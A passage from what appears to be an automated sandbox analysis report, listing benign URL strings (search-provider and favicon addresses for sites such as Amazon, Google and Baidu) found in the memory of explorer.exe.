            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000007.00000000.2196107668.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000007.00000000.2213864870.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2196107668.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Sourc